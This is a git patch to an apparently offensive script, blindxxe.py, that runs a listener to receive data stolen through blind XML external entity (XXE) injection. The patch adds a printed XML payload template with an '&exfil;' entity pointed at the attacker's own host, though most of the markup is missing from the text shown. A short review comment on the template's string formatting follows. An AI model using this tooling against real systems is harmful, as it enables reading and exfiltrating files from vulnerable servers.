From 084d179e71f15964448587aabdce009a53ddaa19 Mon Sep 17 00:00:00 2001 From: Mariusz B Date: Tue, 23 Oct 2018 22:40:06 +0200 Subject: [PATCH] Improved blindxxe.py script (3) --- web/blindxxe.py | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/web/blindxxe.py b/web/blindxxe.py index 058edd7..474d08a 100644 --- a/web/blindxxe.py +++ b/web/blindxxe.py @@ -145,7 +145,6 @@ def fetchRhost(): global config config['rhost'] = socket.gethostbyname(socket.gethostname()) - print('[>] RHOST set to: {}'.format(config['rhost'])) def main(argv): global config @@ -160,6 +159,16 @@ def main(argv): print('[+] Serving HTTP server on: ("{}", {})'.format( config['listen'], config['port'] )) + print('[+] RHOST set to: {}'.format(config['rhost'])) + + print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:') + print(''' + + + +&exfil; + + '''.format(config['rhost'])) server = HTTPServer((config['listen'], config['port']), BlindXXEServer) thread = threading.Thread(target=server.serve_forever)
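Review bot: The XML template added to main() in the second hunk is an inline triple-quoted literal filled by a positional `.format(config['rhost'])`, which is fragile. Any literal `{` or `}` later added to the template would make `str.format` raise or substitute the wrong field, and the literal's source indentation is printed verbatim. A module-level constant with a named field (the name here is only a suggestion), used as `print(XXE_TEMPLATE.format(rhost=config['rhost']))`, would make the substitution explicit and keep main() short. The template's markup is not legible on this page, so its content could not be checked. main() begins before this hunk and continues after it.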